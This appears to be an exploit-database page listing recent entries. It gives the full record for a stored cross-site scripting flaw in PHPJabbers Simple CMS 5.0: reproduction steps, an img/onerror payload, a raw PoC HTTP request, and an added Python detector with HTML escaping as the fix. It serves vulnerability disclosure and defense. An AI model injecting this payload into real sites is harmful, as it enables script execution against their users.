
19 changes to exploits/shellcodes/ghdb

FS-S3900-24T4S - Privilege Escalation
Virtual Reception v1.0 - Web Server Directory Traversal
admidio v4.2.5 - CSV Injection
Companymaps v8.0 - Stored Cross Site Scripting (XSS)
GLPI 9.5.7 - Username Enumeration
OpenEMR v7.0.1 - Authentication credentials brute force
PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scripting
PHPFusion 9.10.30 - Stored Cross-Site Scripting (XSS)
PHPJabbers Simple CMS 5.0 - SQL Injection
PHPJabbers Simple CMS V5.0 - Stored Cross-Site Scripting (XSS)
phpMyFAQ v3.1.12 - CSV Injection
projectSend r1605 - Private file download
revive-adserver v5.4.1 - Cross-Site Scripting (XSS)
Serendipity 2.4.0 - File Inclusion RCE
SoftExpert (SE) Suite v2.1.3 - Local File Inclusion
Advanced Host Monitor v12.56 - Unquoted Service Path
MilleGPG5 5.9.2 (Gennaio 2023) - Local Privilege Escalation / Incorrect Access Control
46 lines
No EOL
1.9 KiB
Text
# Exploit Title: PHPJabbers Simple CMS V5.0 - Stored Cross-Site Scripting (XSS)
# Date: 2023-04-29
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.phpjabbers.com/faq.php
# Software Link: https://www.phpjabbers.com/simple-cms/
# Version: 5.0
# Tested on: Kali Linux

### Steps to Reproduce ###

- Please login from this address:
https://localhost/simplecms/index.php?controller=pjAdmin&action=pjActionLogin
- Click on the "Add Section" button.
- Then enter the payload ("><img src=x onerror=alert("Stored")>) in the "Section" box and save it.
- Boom! An alert message saying "Stored" will appear in front of you.

### PoC Request ###

POST /simplecms/index.php?controller=pjAdminSections&action=pjActionCreate HTTP/1.1
Host: localhost
Cookie: pj_sid=PJ1.0.6199026527.1682777172; pj_so=PJ1.0.6771252593.1682777172; pjd_1682777220_628=1; PHPSESSID=bmannt0kqjm2m0vmb5vj1dbu57; simpleCMS=ejrnh4bmb0ems1j4e4r9fq4eq1; pjd=7l9bb4ubmknrdbns46j7g5cqn7
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 371
Origin: https://localhost
Referer: https://localhost/simplecms/index.php?controller=pjAdminSections&action=pjActionCreate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

section_create=1&i18n%5B1%5D%5Bsection_name%5D=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%22Stored%22%29%3E&i18n%5B2%5D%5Bsection_name%5D=&i18n%5B3%5D%5Bsection_name%5D=&i18n%5B1%5D%5Bsection_content%5D=%3Cp%3E%22%26gt%3B%26lt%3Bimg+src%3Dx+onerror%3Dalert%28%22Stored%22%29%26gt%3B%3C%2Fp%3E&i18n%5B2%5D%5Bsection_content%5D=&i18n%5B3%5D%5Bsection_content%5D=&url=&status=T
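
### Added example: detection and output encoding ###

The following is an added example, not part of the original exploit entry and not PHPJabbers code. It decodes a form body like the one in the PoC request, flags `i18n[N][section_name]` fields that carry markup characters, and shows the value rendered with HTML escaping. The function names, the benign sample body and the `<input value="...">` sink are assumptions made for illustration.

```python
import html
import re
from urllib.parse import parse_qsl

# Trimmed copy of the PoC request body above (section_name fields only).
POC_BODY = (
    "section_create=1"
    "&i18n%5B1%5D%5Bsection_name%5D=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%22Stored%22%29%3E"
    "&i18n%5B2%5D%5Bsection_name%5D="
    "&url=&status=T"
)
# Constructed benign request for comparison (not from the page).
BENIGN_BODY = "section_create=1&i18n%5B1%5D%5Bsection_name%5D=Header+%26+footer&status=T"

# Field name pattern as it appears in the PoC body after URL decoding.
NAME_FIELD = re.compile(r"^i18n\[\d+\]\[section_name\]$")
# Characters that let a value leave an HTML text node or a quoted attribute.
MARKUP = re.compile(r"[<>\"'`]")


def suspicious_section_names(body):
    """Return {field: decoded value} for section_name fields containing markup characters."""
    hits = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        if NAME_FIELD.match(key) and MARKUP.search(value):
            hits[key] = value
    return hits


def render_section_input(name):
    """Hypothetical sink: the stored name placed in a quoted attribute, escaped first.

    html.escape(quote=True) encodes &, <, >, " and ', so the value cannot close
    the attribute or open a new tag.
    """
    return '<input type="text" name="section_name" value="%s">' % html.escape(name, quote=True)


if __name__ == "__main__":
    for label, body in (("poc", POC_BODY), ("benign", BENIGN_BODY)):
        print(label, suspicious_section_names(body))
    stored = suspicious_section_names(POC_BODY)["i18n[1][section_name]"]
    print(render_section_input(stored))
```

Escaping at output time is the actual fix; the request check is only useful for alerting or for auditing rows that are already stored.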